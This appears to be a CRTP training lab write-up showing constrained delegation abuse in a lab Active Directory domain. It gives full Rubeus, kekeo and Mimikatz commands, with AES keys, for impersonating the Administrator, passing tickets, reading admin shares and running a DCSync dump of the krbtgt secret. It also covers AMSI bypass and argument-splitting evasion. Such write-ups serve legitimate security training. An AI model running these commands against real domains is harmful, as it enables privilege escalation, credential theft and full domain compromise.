# CRTP Lab 16 ## Task 1 Enumerate **users** in the domain for whom Constrained Delegation is enabled. * For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured. * Pass the ticket and access the service Use Invishell to and use PowerView to enumerate users with constrained delegation enabled. ``` C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat PS C:\Users\student372> . C:\AD\Tools\PowerView.ps1 PS C:\Users\student372> Get-DomainUser -TrustedToAuth ``` WebSVC has constrained delegation enabled. Since we already have websvc creds, we can use them to access the CIFS/dcorp-mssql as a domain admin. As domain admin, we request TGS for websvc (first hop). This TGS is used to access the CIFS service. ### Abuse with Rubeus We use the websvc hash to request TGS as Domain Administrator from KDC and import it. {% code overflow="wrap" %} ``` # ArgSplit for "s4u" C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt klist ``` {% endcode %} Now we can access the CIFS service ``` C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$ ``` ### Abuse with Kekeo Request a TGT from websvc. {% code overflow="wrap" %} ``` C:\Windows\system32>cd C:\AD\Tools\kekeo\x64 C:\AD\Tools\kekeo\x64>.\kekeo.exe kekeo # tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 ``` {% endcode %} We can use this TGT to request a TGS. We are requesting TGS to access CIFS/dcorp-mssql as DA. {% code overflow="wrap" %} ``` kekeo # tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL ``` {% endcode %} Since the ticket is stored in a file, we can inject it in current session to use it. Open InviShell, Import Mimi, pass the ticket. {% code overflow="wrap" %} ``` C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat . C:\AD\Tools\Invoke-Mimi.ps1 Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"' ``` {% endcode %} We can now access the CIFS service. ``` C:\AD\Tools\kekeo\x64>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$ ``` ## Task 2 Enumerate **computer** accounts in the domain for which Constrained Delegation is enabled. * For such a user, request a TGT from the DC. * Obtain an alternate TGS for LDAP service on the target machine. * Use the TGS for executing DCSync attack. We use Invishell and import PowerView to find users with constrained delegation. ``` # InviShell and AMSI bypass, then PowerView: PS C:\AD\Tools\kekeo\x64> . C:\AD\Tools\PowerView.ps1 # Enumerate Computers with Constrained Delegation enabled PS C:\AD\Tools\kekeo\x64> Get-DomainComputer -TrustedToAuth ``` dcorp-adminsrv has constrained delegation. Since we have AES keys of adminsrv, we use Rubeus to impersonate as Domain Admin. {% code overflow="wrap" %} ``` # ArgSplit for s4u C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt ``` {% endcode %} To abuse LDAP ticket we just imported, we use DCSync to dump the secrets. {% code overflow="wrap" %} ``` # Notice that we can replace the service since it is not encrypted. So instead of TIME, we replaced it with LDAP. Can do HTTP as well. # ArgSplit lsadump::dcsync C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit" ``` {% endcode %}